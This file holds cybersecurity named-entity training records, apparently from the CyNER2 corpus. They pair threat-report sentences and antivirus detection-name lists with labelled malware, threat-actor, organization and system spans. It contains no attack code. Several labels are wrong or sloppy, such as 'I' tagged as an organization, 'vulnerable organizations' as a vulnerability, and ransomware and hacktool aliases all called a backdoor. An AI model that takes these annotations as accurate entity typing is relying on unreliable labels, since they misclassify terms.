{"text": "After publication I was contacted by another analyst who was able to link the information from my blog to other samples from an actual campaign.", "spans": {"ORGANIZATION: I": [[18, 19]], "ORGANIZATION: analyst": [[45, 52]], "THREAT_ACTOR: an actual campaign.": [[125, 144]]}, "info": {"id": "cyner2_train_000715", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Etumbotb Trojan/Ixeshe.i Win32.Trojan.WisdomEyes.16070401.9500.9996 W32/Etumbot.I Backdoor.Typideg Trojan.Etumbot.1 Trojan.Ixeshe.Win32.30 BKDR_ETUMBOT.UQU Trojan.Etumbot W32/Etumbot.UDKV-8115 Trojan.Graftor.D234F5 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000717", "source": "cyner2_train"}}
{"text": "The researcher came upon an interesting set of emails, which were soon determined to be part of a widespread spam campaign.", "spans": {"ORGANIZATION: researcher": [[4, 14]], "THREAT_ACTOR: widespread spam campaign.": [[98, 123]]}, "info": {"id": "cyner2_train_000718", "source": "cyner2_train"}}
{"text": "The site was infected with an iframe injector that redirects to Angler EK.", "spans": {"MALWARE: Angler EK.": [[64, 74]]}, "info": {"id": "cyner2_train_000720", "source": "cyner2_train"}}
{"text": "The number of LINE users in Taiwan reaches up to 17 million in the same year.", "spans": {"ORGANIZATION: LINE": [[14, 18]]}, "info": {"id": "cyner2_train_000721", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.RockRat.S1875120 Troj.W32.Rockrat!c Trojan.Johnnie.D1566D Win32.Trojan.WisdomEyes.16070401.9500.9957 W32/Trojan.IKOU-3732 Backdoor.Rokrat TROJ_KORPODE.A Win.Trojan.Rokrat-6443187-0 Trojan.Win32.RockRat.exmijf Trojan.Inject3.2444 Trojan.RockRat.Win32.1 W32/RockRat.A Trojan.RockRat.a W32/FakeAV.BCMZ!tr Trojan/Win32.RockRat Trojan:Win32/Korpode.A!dha Trojan/Win32.Loader.R219535 Trj/CI.A Win32.Trojan.Rockrat.Ljuk Trojan.RockRat! Win32/Trojan.549", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000722", "source": "cyner2_train"}}
{"text": "The injected code attempts to download them all and execute.", "spans": {}, "info": {"id": "cyner2_train_000724", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.Mudrop!O Spyware.WSLogger Trojan/Dropper.Mudrop.hs Win32.Trojan.WisdomEyes.16070401.9500.9934 W32/Risk.AAJK-2149 Infostealer.Tarno.B Win32/Mdrop.MD not-a-virus:PSWTool.Win32.WSLogger.a Trojan.Win32.Mudrop.dgpnb Trojan.WSLogger.38 BehavesLike.Win32.Wabot.cc W32/Dropper.AOIJ TrojanDropper.Mudrop.amp Trojan[Dropper]/Win32.Mudrop TrojanDropper:Win32/Spiloog.A!bit not-a-virus:PSWTool.Win32.WSLogger.a Dropper/Win32.Mudrop.R19044 TrojanDropper.Mudrop Trojan.DR.Mudrop!uBx16xyI0u0 Trojan-Dropper.Win32.Mudrop", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000725", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BackDoor.Rurktar.3 Backdoor:MSIL/Rurktar.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000727", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Jorik.IRCbot.iia Win32.Trojan.WisdomEyes.16070401.9500.9935 Win32.Worm.Autorun.R TrojWare.Win32.Kryptik.ACZQ Win32.HLLW.Autoruner1.3120 Trojan.Jorik.Win32.159726 BehavesLike.Win32.RAHack.pt Trojan/Jorik.ayqm Trojan/Win32.IRCbot Trojan.IRCbot Win32.Crypt W32/Jorik.FSC!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000730", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clod94b.Trojan.33b2 Trojan.Proxy.Webber.B Trojan-Proxy/W32.Webber.6176 Trojan/Proxy.Webber.b Trojan.PR.Webber!M1rEz2z+nTg W32/Webber.XHQG-0071 Backdoor.Exdis Webber.CB Trojan-Proxy.Win32.Webber.b Trojan.Proxy.Webber.B Trojan.Win32.Webber.ejli Hoax.W32.Renos Trojan.Proxy.Webber.B TrojWare.Win32.TrojanProxy.Webber.B Trojan.Proxy.Webber.B Trojan.Webber.Win32.42 BehavesLike.Win32.Dropper.xm W32/Webber.J TrojanProxy.Webber.r TR/Proxy.Webber.B Trojan[Proxy]/Win32.Webber Win32.Troj.Webber.b.kcloud TrojanProxy:Win32/Webber.B Win-Trojan/Webber.6176 Trojan.Proxy.Webber.B Win32/TrojanProxy.Webber.B W32/DwnLdr.MO!tr Proxy.2.AM Trojan.Win32.Webber.aY Win32/Trojan.a1a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000731", "source": "cyner2_train"}}
{"text": "A backdoor also known as: DLOADER.Trojan Heuristic.Malware", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000733", "source": "cyner2_train"}}
{"text": "They are never well detected but recent ones are getting very poor detections by antiviruses.", "spans": {}, "info": {"id": "cyner2_train_000737", "source": "cyner2_train"}}
{"text": "This exploit kit evolves on an almost constant basis.", "spans": {"MALWARE: exploit kit": [[5, 16]]}, "info": {"id": "cyner2_train_000739", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Application.Hacktool.MD Tool.Kiser.Win32.1373 HackTool.Win32.HackAV.c Application.Hacktool.MD Application.Hacktool.MD BehavesLike.Win32.BadFile.vm W32/Application.MUHU-1657 HackTool.HackAV.e HackTool:Win32/Kapahyku.A Application.Hacktool.MD HackTool.W32.HackAV.tn1i HackTool.Win32.HackAV.c Application.Hacktool.MD Unwanted/Win32.HackAV.R173782 RiskWare.Tool.HCK RiskWare.HackAV! PUA.RiskWare.HackAV Win32/Application.Hacktool.63c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000740", "source": "cyner2_train"}}
{"text": "The WildFire Locker ransomware has risen from the dead and rebranded itself using the apropos name of Hades Locker.", "spans": {"MALWARE: WildFire Locker ransomware": [[4, 30]], "MALWARE: Hades Locker.": [[102, 115]]}, "info": {"id": "cyner2_train_000741", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Dos.Clodf80.Trojan.7c93 Trojan.AOL.PWS.SUPERNAUT.A Trojan.AOL.PWS.SUPERNAUT.A Smalltroj.JNY Trojan.AOL.Supernaut Trojan-IM.Win16.Supernaut Trojan.AOL.PWS.SUPERNAUT.A Trojan.Win16.Supernaut.hqzm Trojan.Win16.A.IM-Supernaut.47117 Win16.Trojan-im.Supernaut.Ebgh Trojan.AOL.PWS.SUPERNAUT.A TrojWare.Win16.AOL.Supernaut Trojan.AOL.PWS.SUPERNAUT.A Trojan.Supernaut.Win16.1 Trojan/AOL.Supernaut TR/Aol.Supernaut Trojan[IM]/Win16.Supernaut Win32.Troj.Undef.kcloud Trojan.AOL.PWS.SUPERNAUT.A Trojan.Win16.Supernaut.Au Win16/AOL.Supernaut NORMAL:Trojan.AOL.Supernaut!19246 Trojan-AOL.Win16.Supernaut W16/AOL.D!tr Trj/AOLPS.D Win32/Trojan.AOL.52f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000743", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Boaxxe.E Trojan.FakeMS.ED Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_ZBOT.SMUH Win32.Trojan.Zbot.N Packed.Win32.Krap.iu Trojan.Win32.Krap.brabpa Packer.W32.Krap.lKMc TrojWare.Win32.Kazy.FOF Trojan.DownLoad3.2720 Win32.Troj.Krap.iu.kcloud Trojan.Graftor.D487A Trojan/Win32.Plosa.R24487 Packed.Win32.Krap.iu BScope.Malware-Cryptor.SB.01798 Bck/Qbot.AO W32/ZBOT.HL!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000744", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Securityshield W32/Trojan.JOHS-0158 Trojan-FakeAV.Win32.SecurityShield.vip Trojan.Win32.FakeAV.euwntc Win32.Trojan-fakeav.Securityshield.Syrj Trojan.Click2.45032 BehavesLike.Win32.Spyware.dc TR/Pingdel.A.15 W32.W.AutoIt.mr6E Trojan-FakeAV.Win32.SecurityShield.vip Trojan.Win32.Pingdel W32/SecurityShield.RMG!tr Win32/Trojan.228", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000745", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Dropper.Msil.BO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000746", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G W32.Virut.CF Win32/Virut.17408 PE_VIRUX.O Win.Phishing.NikoLata-6332081-0 Win32.Virus.Virut.Q Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg Virus.Win32.Virut.CE Win32.Virut.56 PE_VIRUX.O Trojan.MSIL.TrojanClicker Win32/Virut.bt Virus/Win32.Virut.ce Win32.Virut.cr.61440 TrojanClicker:MSIL/Worfload.A!bit W32.Virut.lqtW Virus.Win32.Virut.ce Win32/Virut.F Virus.Virut.14 W32/Sality.AO Win32/Virut.NBP Virus.Win32.VirutChangeEntry.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000747", "source": "cyner2_train"}}
{"text": "Typically, file-less malware has been observed in the context of Exploit Kits such as Angler.", "spans": {"MALWARE: file-less malware": [[11, 28]], "MALWARE: Exploit Kits": [[65, 77]], "MALWARE: Angler.": [[86, 93]]}, "info": {"id": "cyner2_train_000748", "source": "cyner2_train"}}
{"text": "These lures were expected, until we started digging into the actual documents attached and saw an interesting method within the Visual Basic VB macros in the attached documents used for dropping the malware.", "spans": {"MALWARE: Visual Basic VB macros": [[128, 150]], "MALWARE: malware.": [[199, 207]]}, "info": {"id": "cyner2_train_000749", "source": "cyner2_train"}}
{"text": "However, the occasional functional enhancements combined with its multiple layers of obfuscation and server-side polymorphism periodically breathe new life into this seemingly immortal malware.", "spans": {"MALWARE: malware.": [[185, 193]]}, "info": {"id": "cyner2_train_000750", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.CombotoD.Trojan Backdoor.Minaps BKDR_MINAPS.A W32/Trojan.WDQB-6441 Backdoor.Wakeminap!g1 BKDR_MINAPS.A Win.Downloader.133181-1 Trojan.Win32.Snojan.jj Trojan.Win32.A.Downloader.52224.HP DLOADER.Trojan Backdoor:Win32/Minaps.A Trojan.Win32.Snojan.jj Win32.Trojan.Snojan.Wrgx Win32/Trojan.cb9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000751", "source": "cyner2_train"}}
{"text": "Compromised hosts cause a victim's machine to be attached to the Andromeda botnet, giving attackers the ability to push plugins or additional malware onto these machines.", "spans": {"SYSTEM: victim's machine": [[26, 42]], "MALWARE: Andromeda botnet,": [[65, 82]], "THREAT_ACTOR: attackers": [[90, 99]], "MALWARE: plugins": [[120, 127]], "MALWARE: additional malware": [[131, 149]], "SYSTEM: machines.": [[161, 170]]}, "info": {"id": "cyner2_train_000752", "source": "cyner2_train"}}
{"text": "In early 2016 the Callisto Group began sending highly targeted spear phishing emails with malicious attachments that contained, as their final payload, the Scout malware tool from the HackingTeam RCS Galileo platform.", "spans": {"THREAT_ACTOR: the Callisto Group": [[14, 32]], "MALWARE: final payload, the Scout malware tool": [[137, 174]], "ORGANIZATION: HackingTeam": [[184, 195]], "SYSTEM: RCS Galileo platform.": [[196, 217]]}, "info": {"id": "cyner2_train_000753", "source": "cyner2_train"}}
{"text": "Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013.", "spans": {"THREAT_ACTOR: APT33": [[26, 31]], "THREAT_ACTOR: group": [[45, 50]], "THREAT_ACTOR: cyber espionage operations": [[72, 98]]}, "info": {"id": "cyner2_train_000754", "source": "cyner2_train"}}
{"text": "Package Name SHA256 digest SHA1 certificate com.network.android 98ca5f94638768e7b58889bb5df4584bf5b6af56b188da48c10a02648791b30c 516f8f516cc0fd8db53785a48c0a86554f75c3ba com.network.android 5353212b70aa096d918e4eb6b49eb5ad8f59d9bec02d089e88802c01e707c3a1 44f6d1caa257799e57f0ecaf4e2e216178f4cb3d com.binary.sms.receiver 9fae5d148b89001555132c896879652fe1ca633d35271db34622248e048c78ae 7771af1ad3a3d9c0b4d9b55260bb47c2692722cf com.android.copy e384694d3d17cd88ec3a66c740c6398e07b8ee401320ca61e26bdf96c20485b4 7771af1ad3a3d9c0b4d9b55260bb47c2692722cf com.android.copy 12e085ab85db887438655feebd249127d813e31df766f8c7b009f9519916e389 7771af1ad3a3d9c0b4d9b55260bb47c2692722cf com.android.copy 6348104f8ef22eba5ac8ee737b192887629de987badbb1642e347d0dd01420f8 31a8633c2cd67ae965524d0b2192e9f14d04d016 FinFisher exposed : A researcher ’ s tale of defeating traps , tricks , and complex virtual machines March 1 , 2018 Office 365 Advanced Threat Protection ( Office 365 ATP ) blocked many notable zero-day exploits in 2017 .", "spans": {"MALWARE: FinFisher": [[795, 804]], "SYSTEM: Office 365 Advanced Threat Protection": [[911, 948]], "SYSTEM: Office 365 ATP": [[951, 965]]}, "info": {"id": "cyner2_train_000755", "source": "cyner2_train"}}
{"text": "This malware has been around since 2011 and shows no signs of stopping.", "spans": {"MALWARE: malware": [[5, 12]]}, "info": {"id": "cyner2_train_000757", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9982 Trojan.Win32.Dwn.eenglt Win32.Trojan.Spy.Peqf Trojan.DownLoader14.35508 BehavesLike.Win32.HToolMimiKatz.dc Trojan.Symmi.D8341 PWS:Win32/Banker.UC!bit Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000760", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Swisyn.aqrf Win32.Trojan.WisdomEyes.16070401.9500.9996 Win.Trojan.Swisyn-969 Trojan.Win32.Swisyn.deruf Trojan.Win32.A.Swisyn.7680.G Uds.Dangerousobject.Multi!c Trojan.Swisyn.Win32.16931 BehavesLike.Win32.Trojan.zt Trojan/Swisyn.njs Trojan/Win32.Swisyn TrojanDownloader:Win32/Surin.B Trojan.Swisyn!uy708DPUCgU Trojan.Win32.Swisyn W32/Dx.WKM!tr Win32/Trojan.ee6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000761", "source": "cyner2_train"}}
{"text": "Bookworm has little malicious functionality built-in, with its only core ability involving stealing keystrokes and clipboard contents.", "spans": {"MALWARE: Bookworm": [[0, 8]], "MALWARE: malicious": [[20, 29]]}, "info": {"id": "cyner2_train_000763", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm/W32.VBNA.28672.Z Trojan-Ransom.Win32.Blocker!O Worm.VBNA.Win32.168532 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/VB.OHY HT_DROJ_GG310200.UVPM Trojan-Ransom.Win32.Blocker.cdug Trojan.Win32.VB.crkzva Worm.Win32.VBNA.28672.I Trojan.MulDrop4.59381 HT_DROJ_GG310200.UVPM BehavesLike.Win32.VBObfus.mz Worm/VBNA.hggx Trojan/Win32.Vilsel.gic Trojan.Barys.D819 Trojan-Ransom.Win32.Blocker.cdug Trojan:Win32/Droj.A Worm/Win32.VBNA.R79506 Worm.VBNA Trojan.Crypt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000765", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.MSIL Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.DownLoader26.11210 TR/Dropper.MSIL.aexpd Trojan:MSIL/Upadter.A Trj/GdSda.A Win32.Trojan.Inject.Auto Trojan.MSIL.Inject Win32/Backdoor.990", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000767", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojandownloader.Tosct Win32.Trojan.WisdomEyes.16070401.9500.9994 BKDR_WEBRV.A Trojan.Click2.39104 BKDR_WEBRV.A W32/Trojan.KRMY-0312 Trojan.Heur.JP.ED64BF TrojanDownloader:Win32/Tosct.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000768", "source": "cyner2_train"}}
{"text": "Today, RSA Research published an in-depth report on a commercial VPN network, originating in China, which we are calling Terracotta", "spans": {"ORGANIZATION: RSA Research": [[7, 19]], "SYSTEM: commercial VPN network,": [[54, 77]], "MALWARE: Terracotta": [[121, 131]]}, "info": {"id": "cyner2_train_000769", "source": "cyner2_train"}}
{"text": "At the end of March 2017, we detected another malicious document leveraging an unknown vulnerability in EPS and a recently patched vulnerability in Windows Graphics Device Interface GDI to drop malware.", "spans": {"VULNERABILITY: unknown vulnerability": [[79, 100]], "SYSTEM: EPS": [[104, 107]], "VULNERABILITY: vulnerability": [[131, 144]], "SYSTEM: Windows Graphics Device Interface": [[148, 181]], "MALWARE: malware.": [[194, 202]]}, "info": {"id": "cyner2_train_000770", "source": "cyner2_train"}}
{"text": "Increasingly, cyberattackers have been leveraging non-malware attack methods to target vulnerable organizations.", "spans": {"THREAT_ACTOR: cyberattackers": [[14, 28]], "MALWARE: non-malware attack": [[50, 68]], "VULNERABILITY: vulnerable organizations.": [[87, 112]]}, "info": {"id": "cyner2_train_000774", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Troj.W32.Jorik.Virut.ltFj BehavesLike.Win32.Parite.cm Trojan.Kazy.D23845 Trojan:Win32/Dantmil.A Win32/RiskWare.PEMalform.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000775", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader.NSIS.BI Trojan.NSIS.Minix.A Trojan.Downloader.NSIS.BI TROJ_DLDR.SMIM Trackware.MegaSearch TROJ_DLDR.SMIM Win.Trojan.Clicker-3867 Trojan.Downloader.NSIS.BI Trojan.Downloader.NSIS.BI Trojan.Win32.Dwn.kvabt Trojan.Downloader.NSIS.BI Trojan.DownLoader4.20561 Downloader.NSIS.Win32.1874 TrojanDownloader:Win32/Minix.A Trj/CI.A W32/Dloader.EP!tr.NSIS Win32/Trojan.Downloader.79d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000776", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Infostealer.Lokibot Trojan.PWS.Stealer.18836 TROJ_HPUTOTI.SMQ BehavesLike.Win32.Downloader.dh DR/Autoit.ppevb Trojan:Win32/Lepoh.A Spyware.LokiBot Trojan.Win32.Injector Trj/CI.A Win32/Trojan.15d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000779", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Redsip.49152 Backdoor.Redsip.Win32.2 Trojan.Heur.LP.EDEA74 W32/Backdoor2.HIOG Hacktool.Keylogger Win32/Redsip.A BKDR_REDSIP.C Trojan.Win32.Redsip.dcevd Uds.Dangerousobject.Multi!c BKDR_REDSIP.C Backdoor.Win32.Redsip W32/Backdoor.WNDK-6859 TR/Spy.49152.662 Trojan[Backdoor]/Win32.Redsip Win32.Hack.Redsip.b.kcloud Backdoor:Win32/Redsip.B!svc Win-Trojan/Nightdragon.49152 Backdoor.Redsip Win32/Redsip.AA Win32.Trojan.Spy.Lohv W32/REDSIP.B!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000780", "source": "cyner2_train"}}
{"text": "Unit 42 has reported on various Sofacy group attacks over the last year, most recently with a post on Komplex, an OS X variant of a tool commonly used by the Sofacy group.", "spans": {"THREAT_ACTOR: Sofacy group": [[32, 44]], "MALWARE: Komplex,": [[102, 110]], "SYSTEM: OS X": [[114, 118]], "MALWARE: tool": [[132, 136]], "THREAT_ACTOR: the Sofacy group.": [[154, 171]]}, "info": {"id": "cyner2_train_000781", "source": "cyner2_train"}}
{"text": "Analyzing malware is often like solving a puzzle, you have to do it piece by piece to reach the final image.", "spans": {}, "info": {"id": "cyner2_train_000784", "source": "cyner2_train"}}
{"text": "By connecting multiple Black Vine campaigns, we traced how the attack group has evolved over the last three years.", "spans": {"THREAT_ACTOR: Black Vine campaigns,": [[23, 44]], "THREAT_ACTOR: attack group": [[63, 75]]}, "info": {"id": "cyner2_train_000785", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Zusy.D2F05E Win32.Trojan.WisdomEyes.16070401.9500.9757 Trojan.Win32.Badur.cubwxj TrojWare.Win32.Delf.ebs Trojan.DownLoader9.4478 BehavesLike.Win32.Sytro.ch TrojanDownloader:Win32/Cefunlor.A Trojan/Win32.Downloader.R91863 TScope.Trojan.Delf Spyware.PasswordStealer Trojan-Dropper.Delf W32/Delf.RQV!tr.dldr Trj/Dtcontx.L", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000789", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G W32.Virut.CF Win32/Virut.17408 PE_VIRUX.R Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg W32.Virut.lGNe Virus.Win32.Virut.CE Win32.Virut.56 Virus.Virut.Win32.1938 PE_VIRUX.R BehavesLike.Win32.Ramnit.fh Trojan.Win32.Malex Win32/Virut.bt Win32.Virut.dd.368640 TrojanDownloader:Win32/Otlard.D Virus.Win32.Virut.ce Win32.Virus.Virut.U Win32/Virut.F Virus.Virut.14 Win32/Virut.NBP W32/Virut.CE W32/Sality.AO Virus.Win32.VirutChangeEntry.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000791", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.SilentSpy.zmwjp Backdoor.SilentSpy Silentspy.F Win32/SilentSpy.208 BKDR_SILENTSPY.C Trojan.W32.Fadedoor.10B-3 Backdoor.Win32.SilentSpy.208 Backdoor.SilentSpy.D Backdoor.Win32.SilentSpy.208 BackDoor.Silent.208 BKDR_SILENTSPY.C Win32.Hack.SilentSpy.20.kcloud Backdoor.Win32.SilentSpy_208.559104 Win-Trojan/SilentSpy.559104 Backdoor.SilentSpy Win32/SilentSpy.208 Backdoor.Win32.SilentSpy.200 W32/Bdoor.ZT!tr.bdr BackDoor.Silentspy.G", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000792", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HackTool.Incognito Trojan.Win32.Meterpreter.exjxlb Trojan.Win64.Meterpreter W32/Trojan.VCYK-3916 HackTool.Meterpreter.ei HackTool/Win32.Meterpreter Trj/GdSda.A Win32.Hacktool.Meterpreter.Phqd Win32/Trojan.Hacktool.8d0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000794", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm/W32.PadoBot.86528 W32.Sality.U Worm.Padobot.D Win32/Sality.NBA W32/Korgo.V W32.Sality.AE Korgo.V PE_SALITY.RL Worm.Padobot.M Net-Worm.Win32.Padobot.m Worm.Padobot.BV.Dam Worm.Korgo Net-Worm.Win32.Padobot!IK Worm.Padobot.BV.Dam Win32.Lsabot W32/Sality.AT PE_SALITY.RL Win32/Sality.AA Worm:Win32/Korgo.V Win32.Sality.N Worm.Padobot.BV.Dam W32/Korgo.V Win32/IRCBot.worm.variant Virus.Win32.Sality.bakb Malware.Sality Worm.Padobot.bl Net-Worm.Win32.Padobot W32/Padobot!worm.im Worm/Korgo.A W32/Korgo.U.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000795", "source": "cyner2_train"}}
{"text": "The first message after establishing the connection is always sent by the server – the most important thing it contains is a random 128-byte key used for encrypting further communication.", "spans": {"SYSTEM: server": [[74, 80]]}, "info": {"id": "cyner2_train_000796", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.SampleswareTG.Trojan Trojan-GameThief.Win32.Magania!O Backdoor.Farfli.O Trojan/Magania.eken Win32.Trojan.Farfli.ai Win32/Farfli.GKH Win.Trojan.Magania-19224 Trojan-GameThief.Win32.Magania.uagj Trojan.Win32.Magania.bvkxn Troj.W32.MMM.ljA2 Backdoor.Win32.Gh0st.g Trojan.Magania.Win32.38676 BKDR_INJECT.SMJ BehavesLike.Win32.Backdoor.cc Backdoor/IRCBot.qan Trojan.Barys.62 Trojan-GameThief.Win32.Magania.uagj Trojan/Win32.PcClient.R12944 TrojanPSW.Magania Win32/Farfli.AK Trojan.Farfli!czCLTsqt/Nw Backdoor.Win32.FirstInj Backdoor.Win32.Gh0st.BH", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000797", "source": "cyner2_train"}}
{"text": "Several months ago I examined a malware-tainted Word document titled ISIS_twitter_list.doc. I didn't think much of it and quickly moved on after a cursory analysis.", "spans": {}, "info": {"id": "cyner2_train_000799", "source": "cyner2_train"}}
{"text": "As of late December 2019, ITG03-derived macOS malware was discovered being hosted on a fake cryptocurrency-related website, also likely designed by ITG03.", "spans": {"THREAT_ACTOR: ITG03-derived": [[26, 39]], "SYSTEM: macOS": [[40, 45]], "MALWARE: malware": [[46, 53]], "THREAT_ACTOR: ITG03.": [[148, 154]]}, "info": {"id": "cyner2_train_000801", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9982 W32/Backdoor.TGTY-5139 Backdoor.Trojan Win32/Smalldoor.RX BKDR_SHARK.WMP BackDoor.Werchan BKDR_SHARK.WMP W32/Backdoor2.HITJ Trojan.Graftor.Elzob.D3B3C TrojanProxy:Win32/Zolpiq.A Trojan/Win32.Dllbot.R811 Backdoor.Swofi.121 Win32/Trojan.256", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000802", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Tinba.WR4 Trojan/Tinba.be Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Backdoor2.HYQY Trojan.Win32.Inject.dqhpeo TrojWare.Win32.Tinba.BD Trojan.PWS.Tinba.153 Dropper.Injector.Win32.66634 Trojan.Win32.Exploit W32/Backdoor.DVHN-3684 TrojanDropper.Injector.avtd TR/Crypt.Xpack.182297 Trojan[Dropper]/Win32.Injector Trojan/Win32.Small.R145411 TrojanDropper.Injector Trojan.Symmi.DD5E0 Win32/Tinba.BE Trojan.DR.Injector!OJez9sRxlMc W32/Deshacop.XO!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000803", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BehavesLike.Win32.Dropper.dh Trojan.AD.Lnkget TR/AD.Lnkget.hrjck TrojanDownloader:BAT/Lnkget.B Trojan/Win32.PcClient.C204685", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000804", "source": "cyner2_train"}}
{"text": "The results are described in this report.The Trojan may then perform the following actions:Open and close the CD tray Steal Outlook password Steal login passwords to websites Intercept network traffic", "spans": {"MALWARE: Trojan": [[45, 51]]}, "info": {"id": "cyner2_train_000805", "source": "cyner2_train"}}
{"text": "In addition, this template file could also potentially be used to download other malicious payloads to the victim s computer.", "spans": {"MALWARE: malicious payloads": [[81, 99]], "SYSTEM: computer.": [[116, 125]]}, "info": {"id": "cyner2_train_000806", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Xorist.13824 TrojanRansom.Xorist.bh Trojan/Xorist.bh Trojan.Xorist!Ff7hNbBp1Hc W32/NetworkWorm.ROB Trojan-Ransom.Win32.Xorist.bh Trojan.Encoder.91 TR/Ransom.Xorist.BH.3 Trojan/Xorist.q Trojan:Win32/Filecoder.D Trojan/Win32.Xorist Trojan-Ransom.Win32.Xorist", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000807", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.KowinH.Worm Backdoor/W32.PopWin.17408 Backdoor.Win32.Popwin!O Trojan.FakeMS.ED Win32.Trojan.WisdomEyes.16070401.9500.9938 W32.Popwin Win32/Pipown.EI TROJ_NSPAK.A Backdoor.Win32.Popwin.anx Backdoor.Win32.Popwin.~IQ Trojan.Popwin TROJ_NSPAK.A Trojan[Backdoor]/Win32.Popwin Win32.Hack.NsPackT.a.kcloud Trojan:Win32/Pepatch.E Backdoor.Win32.Popwin.anx Worm/Win32.AutoRun.R7462 Worm.Win32.AutoRun Win32/Backdoor.1ad", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000811", "source": "cyner2_train"}}
